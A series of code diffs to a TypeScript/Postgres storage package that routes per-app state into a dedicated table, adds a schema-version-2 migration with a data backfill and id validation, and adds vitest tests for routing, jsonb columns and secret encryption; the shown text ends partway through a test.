@@ -174,7 +205,7 @@ function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
     async delete(id) {
       requireRecordId(id);
       if (config.deleteOverlay(id)) return;
-      await db.query(`DELETE FROM ${config.table} WHERE id = $1`, [id]);
+      await db.query(`DELETE FROM ${config.table} WHERE ${idColumn} = $1`, [id]);
     },
     async list(query: RecordQuery = {}) {
       const limit = pageLimit(query.limit);
@@ -192,16 +223,16 @@ function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
       }
       if (query.ids !== undefined) {
         params.push(query.ids);
-        clauses.push(`id = ANY($${params.length}::text[])`);
+        clauses.push(`${idColumn} = ANY($${params.length}::text[])`);
       }
       if (cursor !== undefined) {
         params.push(cursor.c, cursor.i);
-        clauses.push(`(${config.cursorColumn}, id) < ($${params.length - 1}, $${params.length})`);
+        clauses.push(`(${config.cursorColumn}, ${idColumn}) < ($${params.length - 1}, $${params.length})`);
       }
       params.push(limit + 1);
       const result = await db.query(
         `${config.select}${clauses.length ? ` WHERE ${clauses.join(" AND ")}` : ""}
-         ORDER BY ${config.cursorColumn} DESC, id DESC LIMIT $${params.length}`,
+         ORDER BY ${config.cursorColumn} DESC, ${idColumn} DESC LIMIT $${params.length}`,
         params,
       );
       const allMemory = config.overlayRecords();
@@ -367,6 +398,44 @@ function configFor(store: VendoStore, db: Db, collection: ReservedCollection): R
           return appRecord(row);
         },
         deleteOverlay: (id) => overlay.apps.delete(id),
+      };
+    case "vendo_state":
+      return {
+        table: collection,
+        select: "SELECT app_id, subject, data, updated_at FROM vendo_state",
+        cursorColumn: "updated_at",
+        // No id column: the record id is the reconstructed app_id:subject pair.
+        idColumn: "(app_id || ':' || subject)",
+        refs: { app_id: "app_id", subject: "subject" },
+        fromDb: (row) => stateRecord({
+          appId: text(row["app_id"]),
+          subject: text(row["subject"]),
+          data: row["data"] as Json,
+          updatedAt: iso(row["updated_at"]),
+        }),
+        overlayRecords: () => [...overlay.states.values()].map((row) => stateRecord(snapshot(row))),
+        async put(record) {
+          const { appId, subject } = splitStateId(record.id);
+          const data = requireJson(record.data, "state data");
+          const now = new Date().toISOString();
+          const row: EphemeralStateRow = { appId, subject, data, updatedAt: now };
+          // Mirrors vendo_apps/vendo_threads: ephemerality is decided by the subject
+          // registry (the owning app registers the subject before state is written).
+          if (isEphemeralSubject(store, subject)) {
+            overlay.states.set(stateKey(subject, appId), snapshot(row));
+          } else {
+            await db.query(
+              `INSERT INTO vendo_state (app_id, subject, data, updated_at) VALUES ($1, $2, $3::jsonb, $4)
+               ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at`,
+              [appId, subject, JSON.stringify(data), now],
+            );
+          }
+          return stateRecord(row);
+        },
+        deleteOverlay: (id) => {
+          const { appId, subject } = splitStateId(id);
+          return overlay.states.delete(stateKey(subject, appId));
+        },
       };
   }
 }

--- a/packages/store/src/routing.ts
+++ b/packages/store/src/routing.ts
@@ -1,4 +1,5 @@
 import {
+  VendoError,
   type AppDocument,
   type ApprovalRequest,
   type AuditEvent,
@@ -19,12 +20,14 @@ import {
   putAuditRow,
   putGrantRow,
   putRunRow,
+  putStateRow,
   putThreadRow,
   runFromRow,
+  stateRowFromRow,
   threadFromRow,
 } from "./helpers/rows.js";
 import type { AppRow, ApprovalRow, EphemeralStateRow, RunRow, ThreadRow } from "./helpers/types.js";
-import { decodeCursor, encodeCursor, iso, pageLimit, text } from "./helpers/utils.js";
+import { decodeCursor, encodeCursor, pageLimit } from "./helpers/utils.js";
 import type { VendoStore } from "./store.js";
 import {
   invalid,
@@ -59,12 +62,6 @@ interface RoutedConfig {
   table: ReservedCollection;
   select: string;
   cursorColumn: string;
-  /**
-   * SQL expression that yields a row's record id. Defaults to the `id` column.
-   * `vendo_state` has no id column — its record id is `${app_id}:${subject}`, so it
-   * routes through the reconstructed expression instead.
-   */
-  idColumn?: string;
   refs: Readonly<Record<string, string>>;
   fromDb(row: Record<string, unknown>): VendoRecord;
   overlayRecords(): VendoRecord[];
@@ -158,8 +155,7 @@ function stateRecord(row: EphemeralStateRow): VendoRecord {
     id: `${row.appId}:${row.subject}`,
     data: row.data,
     refs: { app_id: row.appId, subject: row.subject },
-    // vendo_state carries only updated_at; state has no distinct creation timestamp.
-    createdAt: row.updatedAt,
+    createdAt: row.createdAt,
     updatedAt: row.updatedAt,
   };
 }
@@ -168,11 +164,22 @@ function stateRecord(row: EphemeralStateRow): VendoRecord {
  * apps writes state through `records("vendo_state")` with id `${appId}:${subject}`.
  * App ids are `app_...` and never contain a colon, so the first colon splits id into
  * its app_id and subject (subjects may themselves contain colons).
+ *
+ * The colon-free app-id shape is REQUIRED, not assumed: without it `<appId>:<subject>`
+ * is not uniquely decodable — (app_a:b, c) and (app_a, b:c) would both encode to
+ * "app_a:b:c" and collide on read/write/delete. The apps runtime mints colon-free
+ * ids; this enforces it at the door so a doctored id can never target another row.
  */
+const APP_ID_SEGMENT = /^app_[^:]*$/;
+
 function splitStateId(id: string): { appId: string; subject: string } {
   const colon = id.indexOf(":");
   if (colon === -1) invalid(`vendo_state record id must be "<appId>:<subject>": ${id}`);
-  return { appId: id.slice(0, colon), subject: id.slice(colon + 1) };
+  const appId = id.slice(0, colon);
+  if (!APP_ID_SEGMENT.test(appId)) {
+    invalid(`vendo_state record id must start with a colon-free app id ("app_..."): ${id}`);
+  }
+  return { appId, subject: id.slice(colon + 1) };
 }
 
 function matchesRecord(record: VendoRecord, query: RecordQuery, cursor?: { c: string; i: string }): boolean {
@@ -188,13 +195,12 @@ function matchesRecord(record: VendoRecord, query: RecordQuery, cursor?: { c: st
 }
 
 function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
-  const idColumn = config.idColumn ?? "id";
   return {
     async get(id) {
       requireRecordId(id);
       const memory = config.overlayRecords().find((record) => record.id === id);
       if (memory) return memory;
-      const result = await db.query(`${config.select} WHERE ${idColumn} = $1`, [id]);
+      const result = await db.query(`${config.select} WHERE id = $1`, [id]);
       return result.rows[0] ? config.fromDb(result.rows[0]) : null;
     },
     async put(record) {
@@ -205,7 +211,7 @@ function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
     async delete(id) {
       requireRecordId(id);
       if (config.deleteOverlay(id)) return;
-      await db.query(`DELETE FROM ${config.table} WHERE ${idColumn} = $1`, [id]);
+      await db.query(`DELETE FROM ${config.table} WHERE id = $1`, [id]);
     },
     async list(query: RecordQuery = {}) {
       const limit = pageLimit(query.limit);
@@ -223,16 +229,16 @@ function createTableRecordStore(db: Db, config: RoutedConfig): RecordStore {
       }
       if (query.ids !== undefined) {
         params.push(query.ids);
-        clauses.push(`${idColumn} = ANY($${params.length}::text[])`);
+        clauses.push(`id = ANY($${params.length}::text[])`);
       }
       if (cursor !== undefined) {
         params.push(cursor.c, cursor.i);
-        clauses.push(`(${config.cursorColumn}, ${idColumn}) < ($${params.length - 1}, $${params.length})`);
+        clauses.push(`(${config.cursorColumn}, id) < ($${params.length - 1}, $${params.length})`);
       }
       params.push(limit + 1);
       const result = await db.query(
         `${config.select}${clauses.length ? ` WHERE ${clauses.join(" AND ")}` : ""}
-         ORDER BY ${config.cursorColumn} DESC, ${idColumn} DESC LIMIT $${params.length}`,
+         ORDER BY ${config.cursorColumn} DESC, id DESC LIMIT $${params.length}`,
         params,
       );
       const allMemory = config.overlayRecords();
@@ -337,6 +343,12 @@ function configFor(store: VendoStore, db: Db, collection: ReservedCollection): R
           let row: ThreadRow;
           if (isEphemeralSubject(store, data.subject)) {
             const prior = overlay.threads.get(record.id);
+            // Mirror the SQL door's cross-subject refusal (03 §5): the bare id is
+            // shared, so a prior overlay row owned by another subject is never
+            // flipped — it is a conflict, same as putThreadRow's guarded upsert.
+            if (prior !== undefined && prior.subject !== data.subject) {
+              throw new VendoError("conflict", `thread ${record.id} belongs to another subject`);
+            }
             row = {
               id: record.id,
               subject: data.subject,
@@ -402,35 +414,36 @@ function configFor(store: VendoStore, db: Db, collection: ReservedCollection): R
     case "vendo_state":
       return {
         table: collection,
-        select: "SELECT app_id, subject, data, updated_at FROM vendo_state",
-        cursorColumn: "updated_at",
-        // No id column: the record id is the reconstructed app_id:subject pair.
-        idColumn: "(app_id || ':' || subject)",
+        // `id` is the generated (app_id || ':' || subject) column — a real,
+        // indexed column, so point lookups and id filters no longer seq-scan.
+        select: "SELECT id, app_id, subject, data, created_at, updated_at FROM vendo_state",
+        // Page on the STABLE created_at (like every other collection), not the
+        // mutable updated_at — a mid-sweep update must never skip an unvisited row.
+        cursorColumn: "created_at",
         refs: { app_id: "app_id", subject: "subject" },
-        fromDb: (row) => stateRecord({
-          appId: text(row["app_id"]),
-          subject: text(row["subject"]),
-          data: row["data"] as Json,
-          updatedAt: iso(row["updated_at"]),
-        }),
+        fromDb: (row) => stateRecord(stateRowFromRow(row)),
         overlayRecords: () => [...overlay.states.values()].map((row) => stateRecord(snapshot(row))),
         async put(record) {
           const { appId, subject } = splitStateId(record.id);
           const data = requireJson(record.data, "state data");
           const now = new Date().toISOString();
-          const row: EphemeralStateRow = { appId, subject, data, updatedAt: now };
           // Mirrors vendo_apps/vendo_threads: ephemerality is decided by the subject
           // registry (the owning app registers the subject before state is written).
           if (isEphemeralSubject(store, subject)) {
-            overlay.states.set(stateKey(subject, appId), snapshot(row));
-          } else {
-            await db.query(
-              `INSERT INTO vendo_state (app_id, subject, data, updated_at) VALUES ($1, $2, $3::jsonb, $4)
-               ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at`,
-              [appId, subject, JSON.stringify(data), now],
-            );
+            const key = stateKey(subject, appId);
+            const prior = overlay.states.get(key);
+            const row: EphemeralStateRow = {
+              appId,
+              subject,
+              data,
+              createdAt: prior?.createdAt ?? now,
+              updatedAt: now,
+            };
+            overlay.states.set(key, snapshot(row));
+            return stateRecord(row);
           }
-          return stateRecord(row);
+          // Shared persistent write path with stateStore.put (helpers/rows).
+          return stateRecord(await putStateRow(db, { appId, subject, data }, now));
         },
         deleteOverlay: (id) => {
           const { appId, subject } = splitStateId(id);

--- a/packages/store/src/schema.test.ts
+++ b/packages/store/src/schema.test.ts
@@ -38,10 +38,17 @@ for (const backend of backends()) {
     it("stores schema_version and a boot_id in vendo_meta", async () => {
       const rows = await made.sql("SELECT key, value FROM vendo_meta ORDER BY key");
       expect(rows).toEqual(expect.arrayContaining([
-        expect.objectContaining({ key: "schema_version", value: 1 }),
+        expect.objectContaining({ key: "schema_version", value: 2 }),
         expect.objectContaining({ key: "boot_id" }),
       ]));
       expect(rows.find((row) => row.key === "boot_id")?.value).toEqual(expect.any(String));
+    });
+
+    it("lands a fresh database directly on schema version 2", async () => {
+      // A brand-new DB never runs the v2 backfill's DELETE against real data; it
+      // just records the current version. (beforeAll already ran ensureSchema.)
+      const version = (await made.sql("SELECT value FROM vendo_meta WHERE key = 'schema_version'"))[0]?.value;
+      expect(version).toBe(2);
     });
 
     it("keeps boot_id stable across a close and reopen", async () => {

--- a/packages/store/src/schema.test.ts
+++ b/packages/store/src/schema.test.ts
@@ -73,6 +73,32 @@ for (const backend of backends()) {
       }
     });
 
+    it("stores every contracted JSON column as jsonb", async () => {
+      // 02-store §2: "All JSON is jsonb." The table map is public, so the storage type is contract.
+      const jsonbColumns: Array<[string, string]> = [
+        ["vendo_meta", "value"],
+        ["vendo_apps", "doc"],
+        ["vendo_records", "data"],
+        ["vendo_records", "refs"],
+        ["vendo_state", "data"],
+        ["vendo_threads", "messages"],
+        ["vendo_grants", "scope"],
+        ["vendo_approvals", "request"],
+        ["vendo_audit", "event"],
+        ["vendo_runs", "trigger"],
+        ["vendo_runs", "record"],
+      ];
+      const rows = await made.sql(
+        "SELECT table_name, column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name LIKE 'vendo_%'",
+      );
+      const typeOf = new Map(rows.map((row) => [`${row.table_name}.${row.column_name}`, String(row.data_type)]));
+      for (const [table, column] of jsonbColumns) {
+        expect(typeOf.get(`${table}.${column}`), `${table}.${column}`).toBe("jsonb");
+      }
+      // vendo_secrets.ciphertext is deliberately text, not jsonb (§4 at-rest encryption).
+      expect(typeOf.get("vendo_secrets.ciphertext")).toBe("text");
+    });
+
     it("creates a GIN index on vendo_records.refs", async () => {
       const rows = await made.sql(
         "SELECT indexdef FROM pg_indexes WHERE schemaname = 'public' AND tablename = 'vendo_records'",

--- a/packages/store/src/schema.ts
+++ b/packages/store/src/schema.ts
@@ -65,6 +65,19 @@ const ADDITIVE_DDL = [
   "ALTER TABLE vendo_approvals ADD COLUMN IF NOT EXISTS consumed_at timestamptz",
 ] as const;
 
+// Before `vendo_state` was a reserved collection, apps' state singleton landed in
+// vendo_records (collection 'vendo_state', id `${app_id}:${subject}`). Relocate any such
+// rows into the dedicated table so hosts can query them and the app-delete cascade reaches
+// them. Idempotent + forward-only: after the move no matching vendo_records rows remain.
+// App ids never contain ':', so the first colon splits id into app_id + subject.
+const DATA_BACKFILL = [
+  `INSERT INTO vendo_state (app_id, subject, data, updated_at)
+   SELECT split_part(id, ':', 1), substring(id FROM position(':' IN id) + 1), data, updated_at
+   FROM vendo_records WHERE collection = 'vendo_state' AND position(':' IN id) > 0
+   ON CONFLICT (app_id, subject) DO NOTHING`,
+  "DELETE FROM vendo_records WHERE collection = 'vendo_state'",
+] as const;
+
 type Query = Db["query"];
 
 async function migrate(query: Query): Promise<void> {
@@ -88,6 +101,7 @@ async function migrate(query: Query): Promise<void> {
   }
   // Schema v1 has not shipped; keep same-version development databases compatible.
   for (const statement of ADDITIVE_DDL) await query(statement);
+  for (const statement of DATA_BACKFILL) await query(statement);
   await query(
     `INSERT INTO vendo_meta (key, value) VALUES ('boot_id', $1::jsonb)
      ON CONFLICT (key) DO NOTHING`,

--- a/packages/store/src/schema.ts
+++ b/packages/store/src/schema.ts
@@ -4,7 +4,7 @@ import type { Db } from "./db.js";
 import { withSchemaLock } from "./db.js";
 
 /** 02-store §4 */
-export const SCHEMA_VERSION = 1;
+export const SCHEMA_VERSION = 2;
 
 /** 02-store §2 */
 export const DDL = [
@@ -60,22 +60,44 @@ export const DDL = [
   )`,
 ] as const;
 
+// Additive columns stay compatible with same-version development databases (02 §2
+// allows additive columns within the version train; key columns are untouched).
+// vendo_state gains a stable record id (generated from the app_id:subject PK, so
+// point lookups hit an index instead of seq-scanning) and its own created_at, so
+// the seam can expose a creation timestamp that survives updates.
 const ADDITIVE_DDL = [
   "ALTER TABLE vendo_approvals ADD COLUMN IF NOT EXISTS session_id text",
   "ALTER TABLE vendo_approvals ADD COLUMN IF NOT EXISTS consumed_at timestamptz",
+  "ALTER TABLE vendo_state ADD COLUMN IF NOT EXISTS id text GENERATED ALWAYS AS (app_id || ':' || subject) STORED",
+  "ALTER TABLE vendo_state ADD COLUMN IF NOT EXISTS created_at timestamptz",
+  "CREATE INDEX IF NOT EXISTS vendo_state_id_idx ON vendo_state (id)",
 ] as const;
 
-// Before `vendo_state` was a reserved collection, apps' state singleton landed in
-// vendo_records (collection 'vendo_state', id `${app_id}:${subject}`). Relocate any such
-// rows into the dedicated table so hosts can query them and the app-delete cascade reaches
-// them. Idempotent + forward-only: after the move no matching vendo_records rows remain.
-// App ids never contain ':', so the first colon splits id into app_id + subject.
+// v2 backfill (runs once, only when upgrading from a version < 2 — 02 §4 keys
+// migrations by vendo_meta.schema_version, forward-only). Three moves:
+//   1. Relocate legacy vendo_state singletons that a pre-fix deployment wrote into
+//      vendo_records (collection 'vendo_state', id `${app_id}:${subject}`) into the
+//      dedicated table. App ids are colon-free (`^app_[^:]*$`), so the FIRST colon
+//      splits id into app_id + subject unambiguously; the `id ~ '^app_[^:]*:'`
+//      predicate relocates only rows whose leading segment is a real app id — the
+//      SAME shape the state door (splitStateId) enforces. Anything else (colon-less
+//      rows, or ids whose first segment is not app-shaped) SURVIVES in vendo_records
+//      rather than being silently destroyed or misrouted.
+//   2. The DELETE is scoped to the identical predicate as the INSERT — only the rows
+//      actually relocated are removed.
+//   3. Both write doors were live pre-fix (stateStore wrote the dedicated table, the
+//      seam wrote vendo_records), so a legacy row can be NEWER than an existing
+//      dedicated row. Resolve by timestamp (`WHERE vendo_state.updated_at <
+//      EXCLUDED.updated_at`) so the newer write wins instead of DO NOTHING dropping it.
+//   4. Backfill created_at for state rows that predate the created_at column.
 const DATA_BACKFILL = [
   `INSERT INTO vendo_state (app_id, subject, data, updated_at)
    SELECT split_part(id, ':', 1), substring(id FROM position(':' IN id) + 1), data, updated_at
-   FROM vendo_records WHERE collection = 'vendo_state' AND position(':' IN id) > 0
-   ON CONFLICT (app_id, subject) DO NOTHING`,
-  "DELETE FROM vendo_records WHERE collection = 'vendo_state'",
+   FROM vendo_records WHERE collection = 'vendo_state' AND id ~ '^app_[^:]*:'
+   ON CONFLICT (app_id, subject) DO UPDATE SET data = EXCLUDED.data, updated_at = EXCLUDED.updated_at
+     WHERE vendo_state.updated_at < EXCLUDED.updated_at`,
+  "DELETE FROM vendo_records WHERE collection = 'vendo_state' AND id ~ '^app_[^:]*:'",
+  "UPDATE vendo_state SET created_at = updated_at WHERE created_at IS NULL",
 ] as const;
 
 type Query = Db["query"];
@@ -91,7 +113,8 @@ async function migrate(query: Query): Promise<void> {
       `Store schema version ${version} is newer than supported version ${SCHEMA_VERSION}`,
     );
   }
-  if (version === undefined || version < SCHEMA_VERSION) {
+  const upgrading = version === undefined || version < SCHEMA_VERSION;
+  if (upgrading) {
     for (const statement of DDL) await query(statement);
     await query(
       `INSERT INTO vendo_meta (key, value) VALUES ('schema_version', $1::jsonb)
@@ -99,9 +122,15 @@ async function migrate(query: Query): Promise<void> {
       [JSON.stringify(SCHEMA_VERSION)],
     );
   }
-  // Schema v1 has not shipped; keep same-version development databases compatible.
+  // Additive columns are safe to re-apply every run (IF NOT EXISTS); they keep
+  // same-version development databases compatible without a version bump.
   for (const statement of ADDITIVE_DDL) await query(statement);
-  for (const statement of DATA_BACKFILL) await query(statement);
+  // The v2 backfill is destructive-adjacent (it DELETEs from vendo_records), so it
+  // runs ONLY while upgrading past its version — never unconditionally, or a newer
+  // vendo_records write in a mixed-version deploy would be repeatedly relocated/lost.
+  if (upgrading) {
+    for (const statement of DATA_BACKFILL) await query(statement);
+  }
   await query(
     `INSERT INTO vendo_meta (key, value) VALUES ('boot_id', $1::jsonb)
      ON CONFLICT (key) DO NOTHING`,

--- a/packages/store/src/secrets.test.ts
+++ b/packages/store/src/secrets.test.ts
@@ -46,6 +46,34 @@ for (const backend of backends()) {
       expect(await storeSecrets(made.store).get("B_SECRET")).toBeUndefined();
     });
 
+    it("re-encrypts the same value differently each write (GCM nonce)", async () => {
+      // §4 AES-256-GCM: a fresh random nonce per write means ciphertext is non-deterministic,
+      // even for identical plaintext under the same key — no equal-value fingerprinting on disk.
+      await secretStore(made.store).set("NONCE_SECRET", "identical-plaintext");
+      const first = String((await made.sql("SELECT ciphertext FROM vendo_secrets WHERE name = 'NONCE_SECRET'"))[0]?.ciphertext);
+      await secretStore(made.store).set("NONCE_SECRET", "identical-plaintext");
+      const second = String((await made.sql("SELECT ciphertext FROM vendo_secrets WHERE name = 'NONCE_SECRET'"))[0]?.ciphertext);
+      expect(second).not.toBe(first);
+      expect(await storeSecrets(made.store).get("NONCE_SECRET")).toBe("identical-plaintext");
+      await secretStore(made.store).delete("NONCE_SECRET");
+    });
+
+    it("keeps app record data plaintext even when encryption is configured", async () => {
+      // §4: only vendo_secrets.ciphertext is encrypted; app data stays plaintext so the
+      // host-can-query/join promise survives — encrypting it would defeat §2.
+      await made.store.records("app:app_plain:notes").put({
+        id: "plain_note",
+        data: { body: "queryable-cleartext" },
+        refs: { kind: "note" },
+      });
+      const row = (await made.sql("SELECT data FROM vendo_records WHERE id = 'plain_note'"))[0];
+      expect(row?.data).toEqual({ body: "queryable-cleartext" });
+      const matched = await made.sql(
+        "SELECT id FROM vendo_records WHERE data->>'body' = 'queryable-cleartext'",
+      );
+      expect(matched.map((r) => r.id)).toContain("plain_note");
+    });
+
     it("survives close and reopen with the same encryption key", async () => {
       await made.store.close();
       made.store = createStore({ url: made.url, dataDir: made.dataDir, encryption: { key } });

--- a/packages/store/src/state-routing.test.ts
+++ b/packages/store/src/state-routing.test.ts
@@ -1,0 +1,190 @@
+import type { Principal } from "@vendoai/core";
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
+import { backends, type MadeBackend } from "./backends.test-util.js";
+import { appFixture, persistentPrincipal } from "./fixtures.test-util.js";
+import { appStore, createStore, registerEphemeralSubject, stateStore } from "./index.js";
+
+for (const backend of backends()) {
+  describe(`${backend.name} vendo_state routing`, () => {
+    let made: MadeBackend;
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("routes records(vendo_state) writes into the dedicated table, not vendo_records", async () => {
+      const state = made.store.records("vendo_state");
+      const record = await state.put({
+        id: "app_route:user-7",
+        data: { count: 3 },
+        refs: { subject: "ignored", app_id: "ignored" },
+      });
+      expect(record).toMatchObject({
+        id: "app_route:user-7",
+        data: { count: 3 },
+        refs: { app_id: "app_route", subject: "user-7" },
+      });
+
+      // Lands in vendo_state with app_id + subject + data + updated_at populated.
+      expect(await made.sql(
+        "SELECT app_id, subject, data FROM vendo_state WHERE app_id = $1 AND subject = $2",
+        ["app_route", "user-7"],
+      )).toEqual([{ app_id: "app_route", subject: "user-7", data: { count: 3 } }]);
+      expect((await made.sql(
+        "SELECT updated_at FROM vendo_state WHERE app_id = $1 AND subject = $2",
+        ["app_route", "user-7"],
+      ))[0]?.["updated_at"]).toBeDefined();
+
+      // Nothing leaked into the generic records table for this collection.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_records WHERE collection = 'vendo_state'",
+      ))[0]?.["count"])).toBe(0);
+
+      // get / list round-trip through the dedicated table.
+      expect((await state.get("app_route:user-7"))?.data).toEqual({ count: 3 });
+      expect((await state.list({ refs: { app_id: "app_route" } })).records.map((r) => r.id))
+        .toEqual(["app_route:user-7"]);
+
+      // update-in-place, then delete.
+      await state.put({ id: "app_route:user-7", data: { count: 9 } });
+      expect((await state.get("app_route:user-7"))?.data).toEqual({ count: 9 });
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_route'",
+      ))[0]?.["count"])).toBe(1);
+      await state.delete("app_route:user-7");
+      expect(await state.get("app_route:user-7")).toBeNull();
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_route'",
+      ))[0]?.["count"])).toBe(0);
+    });
+
+    it("splits the record id on the first colon so subjects may contain colons", async () => {
+      const state = made.store.records("vendo_state");
+      await state.put({ id: "app_123:user:with:colons", data: { ok: true } });
+      expect(await made.sql(
+        "SELECT app_id, subject FROM vendo_state WHERE app_id = $1",
+        ["app_123"],
+      )).toEqual([{ app_id: "app_123", subject: "user:with:colons" }]);
+      expect((await state.get("app_123:user:with:colons"))?.data).toEqual({ ok: true });
+    });
+
+    it("leaves near-miss collection names in vendo_records", async () => {
+      await made.store.records("vendo_state2").put({ id: "row_a", data: { n: 1 } });
+      await made.store.records("app:x:vendo_state").put({ id: "row_b", data: { n: 2 } });
+      expect(await made.sql(
+        "SELECT collection FROM vendo_records WHERE id IN ('row_a', 'row_b') ORDER BY collection",
+      )).toEqual([{ collection: "app:x:vendo_state" }, { collection: "vendo_state2" }]);
+      // ...and none of it reached the dedicated table.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app:x'",
+      ))[0]?.["count"])).toBe(0);
+    });
+
+    it("rejects a state id that has no colon", async () => {
+      await expect(made.store.records("vendo_state").put({ id: "no_colon", data: {} }))
+        .rejects.toMatchObject({ code: "validation" });
+    });
+
+    it("shares one world between stateStore and the records(vendo_state) seam", async () => {
+      const seam = made.store.records("vendo_state");
+      // helper write is visible through the seam
+      await stateStore(made.store).put(persistentPrincipal, "app_shared", { via: "helper" });
+      expect((await seam.get(`app_shared:${persistentPrincipal.subject}`))?.data).toEqual({ via: "helper" });
+      // seam write is visible through the helper
+      await seam.put({ id: `app_shared:${persistentPrincipal.subject}`, data: { via: "seam" } });
+      expect(await stateStore(made.store).get(persistentPrincipal, "app_shared")).toEqual({ via: "seam" });
+    });
+
+    it("app-delete cascade removes runtime-written state", async () => {
+      const doc = appFixture("app_cascade", "Cascade");
+      await appStore(made.store).put(persistentPrincipal, doc);
+      await made.store.records("vendo_state").put({
+        id: `app_cascade:${persistentPrincipal.subject}`,
+        data: { keep: false },
+      });
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_cascade'",
+      ))[0]?.["count"])).toBe(1);
+
+      await appStore(made.store).delete(doc.id);
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_cascade'",
+      ))[0]?.["count"])).toBe(0);
+    });
+  });
+}
+
+for (const backend of backends()) {
+  describe(`${backend.name} vendo_state ephemeral routing`, () => {
+    let made: MadeBackend;
+    const ephemeral: Principal = { kind: "user", subject: "sess_state", ephemeral: true };
+
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("keeps routed state for an ephemeral subject off disk, then drops it on reopen", async () => {
+      // Creating the app registers the subject as ephemeral (as apps' lifecycle does).
+      await appStore(made.store).put(ephemeral, appFixture("app_ghost", "Ghost"));
+      const seam = made.store.records("vendo_state");
+      await seam.put({ id: "app_ghost:sess_state", data: { secret: 1 } });
+
+      // Readable in-session...
+      expect((await seam.get("app_ghost:sess_state"))?.data).toEqual({ secret: 1 });
+      expect(await stateStore(made.store).get(ephemeral, "app_ghost")).toEqual({ secret: 1 });
+      // ...but nothing hit the table.
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE subject = $1",
+        [ephemeral.subject],
+      ))[0]?.["count"])).toBe(0);
+
+      // Gone after reopen (overlay dropped, no disk row).
+      await made.store.close();
+      made.store = createStore({ url: made.url, dataDir: made.dataDir });
+      await made.store.ensureSchema();
+      expect(await made.store.records("vendo_state").get("app_ghost:sess_state")).toBeNull();
+    });
+  });
+}
+
+for (const backend of backends()) {
+  describe(`${backend.name} vendo_state migration backfill`, () => {
+    let made: MadeBackend;
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("relocates legacy vendo_records state rows into the dedicated table", async () => {
+      // Simulate a pre-fix deployment: state written the old way into vendo_records.
+      await made.sql(
+        `INSERT INTO vendo_records (collection, id, data, refs, created_at, updated_at)
+         VALUES ('vendo_state', $1, $2::jsonb, $3::jsonb, $4, $4)`,
+        ["app_legacy:user_old", JSON.stringify({ legacy: true }), JSON.stringify({ app_id: "app_legacy", subject: "user_old" }), "2026-01-02T03:04:05.000Z"],
+      );
+
+      // Re-running ensureSchema performs the idempotent backfill.
+      await made.store.ensureSchema();
+
+      expect(await made.sql(
+        "SELECT app_id, subject, data FROM vendo_state WHERE app_id = 'app_legacy'",
+      )).toEqual([{ app_id: "app_legacy", subject: "user_old", data: { legacy: true } }]);
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_records WHERE collection = 'vendo_state'",
+      ))[0]?.["count"])).toBe(0);
+      // Visible through the seam its owner reads from.
+      expect((await made.store.records("vendo_state").get("app_legacy:user_old"))?.data)
+        .toEqual({ legacy: true });
+
+      // Idempotent: a second run is a no-op.
+      await made.store.ensureSchema();
+      expect(Number((await made.sql(
+        "SELECT COUNT(*)::int AS count FROM vendo_state WHERE app_id = 'app_legacy'",
+      ))[0]?.["count"])).toBe(1);
+    });
+  });
+}

--- a/packages/store/src/state-routing.test.ts
+++ b/packages/store/src/state-routing.test.ts
@@ -1,4 +1,4 @@
-import type { Principal } from "@vendoai/core";
+import { VendoError, type Principal } from "@vendoai/core";
 import { afterAll, beforeAll, describe, expect, it } from "vitest";
 import { backends, type MadeBackend } from "./backends.test-util.js";
 import { appFixture, persistentPrincipal } from "./fixtures.test-util.js";
@@ -116,6 +116,99 @@ for (const backend of backends()) {
 }
 
 for (const backend of backends()) {
+  describe(`${backend.name} vendo_state id + created_at (M6/C1)`, () => {
+    let made: MadeBackend;
+    beforeAll(async () => {
+      made = await backend.make();
+      await made.store.ensureSchema();
+    });
+    afterAll(async () => { if (made) await made.cleanup(); });
+
+    it("keeps createdAt stable across two puts while updatedAt advances", async () => {
+      const state = made.store.records("vendo_state");
+      const first = await state.put({ id: "app_stable:user_s", data: { v: 1 } });
+      await new Promise<void>((r) => setTimeout(r, 5));
+      const second = await state.put({ id: "app_stable:user_s", data: { v: 2 } });
+      expect(second.createdAt).toBe(first.createdAt);
+      expect(Date.parse(second.updatedAt)).toBeGreaterThanOrEqual(Date.parse(first.updatedAt));
+      // The generated id column reads back through a point lookup (indexed, not seq scan).
+      expect((await state.get("app_stable:user_s"))?.createdAt).toBe(first.createdAt);
+      expect(await made.sql(
+        "SELECT id FROM vendo_state WHERE id = $1", ["app_stable:user_s"],
+      )).toEqual([{ id: "app_stable:user_s" }]);
+    });
+
+    it("both write doors (stateStore + routed seam) produce identical rows", async () => {
+      const viaHelper = await stateStore(made.store);
+      await viaHelper.put(persistentPrincipal, "app_doors", { same: true });
+      const helperRow = (await made.sql(
+        "SELECT id, app_id, subject, data FROM vendo_state WHERE id = $1",
+        [`app_doors:${persistentPrincipal.subject}`],
+      ))[0];
